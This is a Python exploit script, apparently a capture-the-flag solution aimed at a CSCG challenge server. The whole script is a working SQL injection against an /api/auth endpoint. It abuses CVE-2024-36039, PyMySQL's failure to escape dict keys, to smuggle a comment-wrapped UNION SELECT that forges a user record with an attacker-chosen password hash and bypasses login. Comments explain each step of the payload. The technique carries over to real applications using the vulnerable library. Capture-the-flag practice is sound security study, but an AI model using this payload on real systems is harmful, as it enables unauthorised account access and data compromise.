import requests import hashlib BASE_URL = "https://usylj6lnspfp6iquvda5y7tlxu-5000-ass.challenge.cscg.live/" TOKEN = "crazypassword" def password_hash(password: str) -> str: return hashlib.sha256(password.encode()).hexdigest() token_hash = password_hash(TOKEN) print(f"[*] Hash: {token_hash}") # 1. First key: Parses as a User object, bypasses quotes, and opens the comment block. # Regex requires: 4-10 chars, 7+ chars, 2 uppercase chars. key_open = "fn/*,1234567,XX" # 2. Second key: Because of CVE-2024-36039, PyMySQL does NOT escape dict keys! # Python wraps it in double quotes, but MariaDB will ignore the opening quote # because it falls inside our /* */ comment block. key_payload = "*/ PI()}) UNION SELECT 1,'hacker','" + token_hash + "','us',1 #" # Python dicts preserve order! # fn/* comes first, opening the comment. # The payload comes second, closing the comment and injecting. r = requests.post(f"{BASE_URL}/api/auth", json=[{ key_open: "irrelevant", key_payload: "also irrelevant", "token": TOKEN }]) print("[*] Auth:", r.json())